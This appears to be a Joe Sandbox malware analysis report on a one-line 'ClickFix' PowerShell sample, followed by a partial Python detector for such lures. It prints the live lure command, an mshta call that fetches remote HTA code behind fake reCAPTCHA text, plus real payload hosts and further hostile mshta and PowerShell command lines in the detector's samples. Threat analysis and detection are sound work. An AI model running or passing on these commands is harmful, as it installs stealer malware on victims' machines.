https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 00000003.00000003.1696559513.0000026275AD2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr | false | | high
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dlorerY) | mshta.exe, 00000002.00000002.1894016581.000001F01B6A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1667002839.0000018B8006B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811581786.000001E5D95E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://deduhko2.kliphuwatey.shop/Poket.mp4w | mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dH | mshta.exe, 00000002.00000002.1893645402.000001F01B3F0000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://deduhko2.kliphuwatey.shop/Poket.mp4LMEMX | mshta.exe, 00000002.00000002.1895547199.000001F8210F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1875575722.000001F8210F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1879974812.000001F8210F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878062600.000001F8210F6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | solve.vwglq.com | European Union | 13335 | CLOUDFLARENETUS | true
172.67.144.62 | deduhko2.kliphuwatey.shop | United States | 13335 | CLOUDFLARENETUS | false
                                                IP
                                                127.0.0.1
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1582960
                                                Start date and time:2025-01-01 05:35:08 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 5m 34s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:12
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:1.ps1
                                                Detection:MAL
                                                Classification:mal84.evad.winPS1@11/15@3/3
                                                EGA Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 44
                                                • Number of non-executed functions: 11
                                                Cookbook Comments:
                                                • Found application associated with file extension: .ps1
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.12.23.50, 13.107.246.45
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target mshta.exe, PID 7584 because there are no executed function
                                                • Execution Graph export aborted for target powershell.exe, PID 7432 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 7772 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 8128 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
23:36:01 | API Interceptor | 2x Sleep call for process: svchost.exe modified
23:36:02 | API Interceptor | 90x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
188.114.97.3 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.rgenerousrs.store/o362/
188.114.97.3 | A2028041200SD.exe | malicious | FormBook | www.beylikduzu616161.xyz/2nga/
188.114.97.3 | Delivery_Notification_00000260791.doc.js | malicious | Unknown | radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
188.114.97.3 | ce.vbs | malicious | Unknown | paste.ee/d/lxvbq
188.114.97.3 | Label_00000852555.doc.js | malicious | Unknown | tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
188.114.97.3 | PO 20495088.exe | malicious | FormBook | www.ssrnoremt-rise.sbs/3jsc/
188.114.97.3 | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/zWkbOqX7/download
188.114.97.3 | http://kklk16.bsyo45ksda.top | malicious | Unknown | kklk16.bsyo45ksda.top/favicon.ico
188.114.97.3 | gusetup.exe | malicious | Unknown | www.glarysoft.com/update/glary-utilities/pro/pro50/
188.114.97.3 | Online Interview Scheduling Form.lnk | malicious | Ducktail | gmtagency.online/api/check
172.67.144.62 | http://classicshell.mediafire.com/file/d5llbbm8wu92jg8/ClassicShellSetup_4_3_1.exe | malicious | Unknown |
172.67.144.62 | https://asacannes.com/quelle-pression-de-pneu-sur-ford-puma/ | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
deduhko.klipzyroloo.shop | Poket.mp4.hta | malicious | LummaC | 188.114.97.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://gogl.to/3HGT | malicious | CAPTCHA Scam ClickFix | 188.114.97.3
CLOUDFLARENETUS | setup.exe | malicious | Unknown | 104.21.30.45
CLOUDFLARENETUS | U1jaLbTw1f.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.21.38.84
CLOUDFLARENETUS | rename_me_before.exe | malicious | Python Stealer, Exela Stealer | 162.159.128.233
CLOUDFLARENETUS | Loader.exe | malicious | LummaC | 104.21.48.1
CLOUDFLARENETUS | https://thetollroads.com-wfmo.xyz/us | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | http://img1.wsimg.com/blobby/go/9b6ed793-452c-4f8f-8f80-6847f4d114d7/downloads/71318864754.pdf | malicious | Unknown | 104.16.123.96
CLOUDFLARENETUS | decrypt.exe | malicious | Unknown | 104.21.16.1
CLOUDFLARENETUS | decrypt.exe | malicious | Unknown | 104.21.16.1
CLOUDFLARENETUS | FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msg | malicious | Unknown | 104.16.123.96
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Let's_20Compress.exe | malicious | Unknown | 188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e | YJaaZuNHwI.exe | malicious | Quasar | 188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e | Etqq32Yuw4.exe | malicious | DCRat, PureLog Stealer, zgRAT | 188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e | OPRfEWLTto.js | malicious | Unknown | 188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e | http://4.lkx91.michaelhuegel.com/news?q=IP%20provider%20is%20blacklisted!%20MICROSOFT-CORP-MSN-AS-BLOCK | malicious | Unknown | 188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e | over.ps1 | malicious | Vidar | 188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e | http://trezorbridge.org/ | malicious | Unknown | 188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e | tyPafmiT0t.exe | malicious | 44Caliber Stealer, BlackGuard, Rags Stealer | 188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e | vEtDFkAZjO.exe | malicious | RL STEALER, StormKitty | 188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e | Invoice-BL. Payment TT $ 28,945.99.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 188.114.97.3
37f463bf4616ecd445d4a1937da06e19 | setup.exe | malicious | Unknown | 188.114.97.3, 172.67.144.62
37f463bf4616ecd445d4a1937da06e19 | Let's_20Compress.exe | malicious | Unknown | 188.114.97.3, 172.67.144.62
37f463bf4616ecd445d4a1937da06e19 | CenteredDealing.exe | malicious | Vidar | 188.114.97.3, 172.67.144.62
37f463bf4616ecd445d4a1937da06e19 | CenteredDealing.exe | malicious | Vidar | 188.114.97.3, 172.67.144.62
37f463bf4616ecd445d4a1937da06e19 | LinxOptimizer.exe | malicious | Unknown | 188.114.97.3, 172.67.144.62
37f463bf4616ecd445d4a1937da06e19 | setup.msi | malicious | Unknown | 188.114.97.3, 172.67.144.62
37f463bf4616ecd445d4a1937da06e19 | over.ps1 | malicious | Vidar | 188.114.97.3, 172.67.144.62
37f463bf4616ecd445d4a1937da06e19 | MatAugust.exe | malicious | Vidar | 188.114.97.3, 172.67.144.62
37f463bf4616ecd445d4a1937da06e19 | DypA6KbLrn.lnk | malicious | Unknown | 188.114.97.3, 172.67.144.62
37f463bf4616ecd445d4a1937da06e19 | IOnqEVA4Dz.lnk | malicious | Unknown | 188.114.97.3, 172.67.144.62
                                                    No context
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 1.3073369134115063
Encrypted: false
SSDEEP: 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrB:KooCEYhgYEL0In
MD5: 23AD15F0339A50152466277CB1FA31D7
SHA1: 69EE9AD38927D207C3AC57C350722A0208852EB6
SHA-256: E6AEB72CF12EF8FB75E1ACAD9AFAF558F3BF5E873C6A4C16A9581A60F42A31B9
SHA-512: D31A9B5D5412B811B4D5B15D88E661B1237BE9813E2BE6EADC484ECA9921F06D5F8F381B241A673FBE5EF8684EC277FCB1614142EC3C4A6E7D2B1F9052420882
Malicious: false
Reputation: low
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x09f936ef, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.42211189259761683
Encrypted: false
SSDEEP: 1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
MD5: A1885FA4AD3BB8A6230674E85313E2DA
SHA1: 314B3FC61F6328D6A609D9CA6442247A92861528
SHA-256: AB015436925D1705DB2BD5C747C2855F9F7B9A3FA1C864AB51210EC5D047287C
SHA-512: 44B312A56C14BE3DAD8EED15184DCE4DDBD0B7DB553757BF2ADB63C3F4541E219A832EB32A286FA822A4349F7988070CD43D3B29A58E5698C17B435030E9B5AE
Malicious: false
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.07664017863223768
Encrypted: false
SSDEEP: 3:2UYeT0Wagejjn13a/QXkRs/YllcVO/lnlZMxZNQl:NzT07bj53qQ0RBOewk
MD5: 974E4DB9DBBB62666752944D89F8383E
SHA1: D7CEAAEAFD8E44C8AEAD0EA6D246BE886CADB0CC
SHA-256: A58C09148A788B9B1326C7041A0ADE39BA272AF35932389033AFFCB39AADAAE8
SHA-512: 628D42C97994D319E2A42B7FE2D60F36047746AB4ED6B8655330ADF644FE2605E67B256D1C4A952470AE11D66CC90CCE855F655A51FEE8367C2CAD93C59AF690
Malicious: false
Process: C:\Windows\System32\mshta.exe
File Type: data
Category: dropped
Size (bytes): 1645681
Entropy (8bit): 5.577136957505929
Encrypted: false
SSDEEP: 6144:7l5Aka0fKZdWkSflCSzBeJ2IbRGeYeyWfpYBe04PebeYj4BqrrvDqHHU11kYYTGm:4j
MD5: 9FB3DB7B334F385701B3C88D63B7E5EE
SHA1: D901CD79292CF0F31DB2F1C83A62460E1F6A1EF5
SHA-256: 658D84007977B9BCBAC196D09EC012E15DBA6D71F026613BB08E3A0EC4ACEEF8
SHA-512: 25A2CF3ED7F5B11CEB936C3EBD0696C5D4A63837DC2B1D90D9FA772F852D673C98D5BA8083B63F1BD9212DB4F8059167248B7242CBD7C785E3941B8E08AB780C
Malicious: false
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 12584
Entropy (8bit): 4.905392021155998
Encrypted: false
SSDEEP: 384:brib4Z1VoGIpN6KQkj2qkjh4iUxCdjT6Ypib47:bL1V3IpNBQkj2Ph4iUxCdX6YP
MD5: 3A797BB89F31B1A6A41B9531C27450B4
SHA1: F88C7BA1622656BA69E2041EED645AE4182A06B4
SHA-256: 09DB28EA3982D7E071A8383057146C78F2C71D9FED8CCEC309DE9E1CA01108A4
SHA-512: C09328F9B63B831A6906AFE695581083F5AE3858825E5A8AB6E7698F604C25C19338CB80E32D0F0756C875DE8F20CD5A577C1B967D9B1513CF39832D4AA7F8E5
Malicious: false
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1564
Entropy (8bit): 5.43409546119742
Encrypted: false
SSDEEP: 48:aWSU4Yymp+gs4RIoU99tlNWR8I75e2+9FPX4:aLHYvvsIfAXWN7c24Ff4
MD5: E8F1577E5CB13D946AD997DDE8F24B75
SHA1: 94DBF51FF7E78DE79AD193AEB1245BD6FFAE5E4A
SHA-256: 4CC1D19F2F72B18F81188BB104A5322576268E29CA92232C303FEF57460C8F3E
SHA-512: 046BE0731B97EDEEB1D0DA3EB7B4C51267F37AC0AE7BF640B52D345594293AB65DF48F5F537EFE7A1C339CD7AA3BFCD88EB322E1B1470A61FFA59C80618C8BF7
Malicious: false
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6221
Entropy (8bit): 3.727710574127003
Encrypted: false
SSDEEP: 48:TjF8FG2LPr3C4U28njQukvhkvklCywPmdgSCGls5SogZoGASCGl15SogZoy1:Nj233CxHnNkvhkvCCtPSCGPHMSCG4HN
MD5: 144CABC9DB5F793B20CB5803FE368D13
SHA1: 8DFDB64FD2FE3F5F6405C5ABD8CA75C1E65BFF72
SHA-256: 83E881CA00D2F308FA484B243A9A5A7ACB321763B800C71EFCF56C7E5B265B07
SHA-512: B54A536DC920CFA56A019443F633F60BAF1AE04C4D589B430218BBF13CD80703E4AAB4168E74172046E4BD6AC55B40FDA54988C415176DB16970440513611B50
Malicious: false
                                                    Preview:...................................FL..................F.".. ...-/.v........\..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.........\...r*..\......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^!Z{$...........................%..A.p.p.D.a.t.a...B.V.1.....!Zy$..Roaming.@......CW.^!Zy$...........................A.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^!Z}$..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWO`..Windows.@......CW.^DWO`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^!Z}$....Q...........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6221
                                                    Entropy (8bit):3.727710574127003
                                                    Encrypted:false
                                                    SSDEEP:48:TjF8FG2LPr3C4U28njQukvhkvklCywPmdgSCGls5SogZoGASCGl15SogZoy1:Nj233CxHnNkvhkvCCtPSCGPHMSCG4HN
                                                    MD5:144CABC9DB5F793B20CB5803FE368D13
                                                    SHA1:8DFDB64FD2FE3F5F6405C5ABD8CA75C1E65BFF72
                                                    SHA-256:83E881CA00D2F308FA484B243A9A5A7ACB321763B800C71EFCF56C7E5B265B07
                                                    SHA-512:B54A536DC920CFA56A019443F633F60BAF1AE04C4D589B430218BBF13CD80703E4AAB4168E74172046E4BD6AC55B40FDA54988C415176DB16970440513611B50
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...-/.v........\..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.........\...r*..\......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^!Z{$...........................%..A.p.p.D.a.t.a...B.V.1.....!Zy$..Roaming.@......CW.^!Zy$...........................A.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^!Z}$..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWO`..Windows.@......CW.^DWO`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^!Z}$....Q...........
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):55
                                                    Entropy (8bit):4.306461250274409
                                                    Encrypted:false
                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                    Malicious:false
                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                    File type:Unicode text, UTF-8 text, with no line terminators
                                                    Entropy (8bit):5.310404947527902
                                                    TrID:
                                                      File name:1.ps1
                                                      File size:143 bytes
                                                      MD5:1ca2c37d699c31038a935df80666343b
                                                      SHA1:845e2fc0ff86d9e1b40f6d3536a636fdeaa4a3d4
                                                      SHA256:be8ec04111bf65a104b306bc679f9c467e7bbe1723bb8eeaa23be1d0ba84c6dd
                                                      SHA512:455e808a2b4801b3ba8b5639d5ab35c544f9ff33f87fdc3f244d29203602331a4f8e5ffaeb67b10cb29e6cf2081a1b8c54e17bf2f8813f3e558e59a9382047b2
                                                      SSDEEP:3:rN6e/ITPJMiaefRBsho3SHEVX95t+RbqRF4I1yMQRWLQn:Z6e2BOefshQ3Xb0IMPyQ
                                                      TLSH:8FC02B73040410391E3363D0425129E00F3A0314D88961CF2D7E0474824F2F3C713E10
                                                      File Content Preview:mshta https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d # ... ''I am not a robot - reCAPTCHA Verification ID: 4885''
                                                      Icon Hash:3270d6baae77db44
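The 143-byte sample is a one-line "ClickFix" lure: `mshta` is handed a remote URL and the trailing `#` comment carries the fake "I am not a robot - reCAPTCHA Verification ID" text that is meant to reassure a victim pasting it into the Run box. The following detector is an added example, not Joe Sandbox output and not code from the sample's author: it scores process command lines for that pattern. The first sample line reproduces the file content preview above; the other command lines, the tag names and the severity ladder are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample command lines. "page_sample" reproduces the file content
# preview of 1.ps1 on this page; the rest are made-up contrasts for the detector.
SAMPLE_CMDLINES = {
    "page_sample": "mshta https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d "
                   "# ... ''I am not a robot - reCAPTCHA Verification ID: 4885''",
    "local_hta": r"mshta.exe C:\Windows\Temp\update.hta",
    "ps_bypass_remote": 'powershell -ep bypass -w hidden -c "mshta http://203.0.113.10/x.hta"',
    "inline_vbscript": 'mshta vbscript:Close(Execute("CreateObject(""WScript.Shell"").Run ""calc"""))',
    "benign": r"notepad.exe C:\Users\user\notes.txt",
}

# mshta / mshta.exe as an executable token (start of line, after whitespace,
# after a quote, or path-qualified).
MSHTA_RE = re.compile(r'(?:^|[\s"\\/])mshta(?:\.exe)?(?=\s|$|")', re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s'"<>]+""", re.IGNORECASE)
INLINE_PROTO_RE = re.compile(r"\b(?:vbscript|javascript|about):", re.IGNORECASE)
EP_BYPASS_RE = re.compile(r"-(?:ep|exec|executionpolicy)\s+(?:bypass|unrestricted)", re.IGNORECASE)
# Phrases typical of fake-CAPTCHA lures pasted into the Run box (assumed list).
LURE_PHRASES = ("i am not a robot", "recaptcha", "verification id", "cloudflare")


def analyze_cmdline(cmd: str) -> dict:
    """Tag a process command line for ClickFix-style mshta abuse.

    Tags (hypothetical names):
      mshta_execution       mshta / mshta.exe appears as an executable token
      mshta_remote_url      mshta is given an http(s) URL (remote HTA fetch)
      mshta_inline_script   mshta is given a vbscript:/javascript: payload
      clickfix_lure_text    a trailing '#' comment carries fake-CAPTCHA lure text
      powershell_ep_bypass  the execution policy is explicitly lowered
    Returns {"severity": ..., "tags": [...], "hosts": [...]}.
    """
    tags, hosts = [], []
    if MSHTA_RE.search(cmd):
        tags.append("mshta_execution")
        hosts = [urlparse(u).hostname or "" for u in URL_RE.findall(cmd)]
        if hosts:
            tags.append("mshta_remote_url")
        if INLINE_PROTO_RE.search(cmd):
            tags.append("mshta_inline_script")
    # The Run box does not treat '#' as a comment, so everything after it is
    # ignored by the shell but shown to the victim: that is where lure text lives.
    comment = cmd.split("#", 1)[1] if "#" in cmd else ""
    if any(p in comment.lower() for p in LURE_PHRASES):
        tags.append("clickfix_lure_text")
    if EP_BYPASS_RE.search(cmd):
        tags.append("powershell_ep_bypass")

    # Severity ladder: remote or inline mshta content is high on its own;
    # lure text or a policy bypass on top of it escalates to critical.
    severity = "info"
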